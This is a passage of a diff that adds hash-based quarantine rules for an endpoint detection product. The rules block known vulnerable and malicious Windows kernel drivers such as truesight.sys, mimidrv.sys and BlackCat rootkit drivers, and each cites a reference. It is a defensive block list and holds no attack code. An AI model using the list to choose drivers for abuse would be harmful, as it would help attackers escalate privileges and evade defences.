+ "last_update": "2026-03-23T11:45:30.473125Z",
+ "creation_date": "2026-03-23T11:45:30.473129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc8cb3aebe911bd9b4a3caf46f7dda0f73fec4d2e4e7bc9601bb6726f5893091",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e208ebb8-e51d-501b-b1ca-e32bf84d4d7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824404Z",
+ "creation_date": "2026-03-23T11:45:31.824408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824417Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80f3535ebfa3f9448baa7074386872e8db8fad71da7fa7ef79a0a3ddf694f982",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e20df849-eb71-5be5-9ff7-a8514093e184",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146117Z",
+ "creation_date": "2026-03-23T11:45:32.146120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d06688123a9251aeb76ac8dad2af956566e2f1051550988611c7623dbebb3d3",
+ "comment": "Vulnerable Kernel Driver (aka neofltr.sys) [https://www.loldrivers.io/drivers/c44e6197-efab-49d2-8a5f-04ae4a0f0ea0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e234e327-12e7-5f8c-92a1-5e1210e296fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980340Z",
+ "creation_date": "2026-03-23T11:45:29.980342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2665d3127ddd9411af38a255787a4e2483d720aa021be8d6418e071da52ed266",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e239108c-8623-5317-99f7-0fdedc38ac1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819019Z",
+ "creation_date": "2026-03-23T11:45:30.819021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40ebdd21c93146a92536688a230801791a86e2bec2719896a3d629ad930e9f17",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e23f6eac-0453-5211-916d-4ccddfbe0a01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495417Z",
+ "creation_date": "2026-03-23T11:45:31.495420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f76f5b988cdf003d62c75db7a866a88ff266485bf74e51492134d83b94a9bce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e247529f-ff12-51f9-ac92-07683f3159b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613224Z",
+ "creation_date": "2026-03-23T11:45:29.613226Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7c6f397f1fb230627bb537e1cf59283be04d17d050a384661e00aba6877b145",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e2514b33-6230-55f6-bed3-d4f3581fb251",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462984Z",
+ "creation_date": "2026-03-23T11:45:30.462988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e253c5e3-dbf2-50c5-9eec-ea5270254fa8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819209Z",
+ "creation_date": "2026-03-23T11:45:30.819211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db0bcfb5bbd93abc8682508af224a1aa5e96f82f037ee0ba26d1d02a3d639a2a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e267c3eb-213d-53fd-8ab4-02e1ca348d21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828596Z",
+ "creation_date": "2026-03-23T11:45:30.828598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41de3c49f4f1a68015cafad2d26e52a94ad84c6115ca8a3a6f30f694501166c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e26c5a57-f487-591b-806b-95b6365e7509",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815815Z",
+ "creation_date": "2026-03-23T11:45:31.815817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9da4966af33f53ca136ed1e329183d4920e8bb6c0d5e78bbe0ef318b110ac54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e273a147-e68e-5a83-abb0-e9b4e38b4aa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482122Z",
+ "creation_date": "2026-03-23T11:45:31.482127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c052dc397f7511e3efe9ca222a43aa2b23a4d7e0919236dcbfafef1ebbb42d55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e27d1beb-34e6-5912-b81e-aab112a892a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981957Z",
+ "creation_date": "2026-03-23T11:45:29.981960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e",
+ "comment": "Vulnerable Kernel Driver (aka TGSafe.sys) [https://www.loldrivers.io/drivers/ad693146-4adf-4407-bb20-f2505e34c226/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e27e832f-c988-5829-9bf0-c3cc6899bc3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985521Z",
+ "creation_date": "2026-03-23T11:45:29.985523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bec69c1b22603e9a385495fbe94700ac36b28e5",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e288ee5e-f8d9-58f6-a965-344e85b4f4a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826728Z",
+ "creation_date": "2026-03-23T11:45:30.826730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f24b7c60fa8ca31d84525aa5bb83390a27221a4699e9013cb2d2bfe309cc233b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e28da84a-7eff-536e-a1cf-bd52ea37fbf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974818Z",
+ "creation_date": "2026-03-23T11:45:29.974820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81c301c77dbfff44567165139e9a5ee3af2aee838298451c7075dc6e1aae489f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e2e004d6-948b-56b6-a67f-b422fa79aaa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487469Z",
+ "creation_date": "2026-03-23T11:45:31.487471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66394d18086f41b56ea4b0ef6292204274c2effc63247934a4b2bf5f9a583d7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e30ab370-8d90-5e40-8216-01249ab22bb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459765Z",
+ "creation_date": "2026-03-23T11:45:30.459769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1beb15c90dcf7a5234ed077833a0a3e900969b60be1d04fcebce0a9f8994bdbb",
+ "comment": "Vulnerable Kernel Driver (aka Driver7.sys) [https://www.loldrivers.io/drivers/9ca73d04-3349-4c16-9384-94c43335a031/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3251261-a83c-51ad-8a89-5b24a67cc2a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144305Z",
+ "creation_date": "2026-03-23T11:45:32.144308Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa96eca78a57b779fd398294ae2519b7c4fe9e4369e6e7fa5167aebbe6e0c09a",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e32629ec-8c02-50fe-9457-71bccff6d1db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476083Z",
+ "creation_date": "2026-03-23T11:45:31.476087Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c16a31bdd0b2163034d3b45dbe7e57ed733d4cc0fdedddc1dd5ca16bb9ebb05",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e334ef88-95ca-50b3-a0dc-2967a51fe2ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613529Z",
+ "creation_date": "2026-03-23T11:45:29.613531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a60efb06feeb96bad4b8d814896609b6bda6f130464aa963a881a38a3f06b7cb",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3363f98-d8e6-557c-8c91-7f0772b47f24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140267Z",
+ "creation_date": "2026-03-23T11:45:31.140269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140278Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7758ddbec387b671f9027f0feda7d34797ce9e92eebb3bde2087a4d4cab8aeb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e33b69b6-fa1f-5abb-ae24-950ce83782bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836612Z",
+ "creation_date": "2026-03-23T11:45:30.836614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
